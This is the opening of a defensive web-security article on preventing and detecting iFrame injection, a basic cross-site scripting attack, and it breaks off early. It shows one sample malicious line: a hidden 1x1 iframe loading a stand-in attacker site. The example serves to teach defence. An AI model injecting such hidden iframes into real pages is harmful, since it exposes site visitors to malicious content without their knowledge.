Measures to Prevent and Detect iFrame Injection Attacks
byJOSEPH SCHEMBRI
IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:
iframe src=”http://www.example-hacker-site.com/inject/?s=some parameters” width=”1″ height=”1″ style=”visibility: hidden” /iframe
The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” [...]





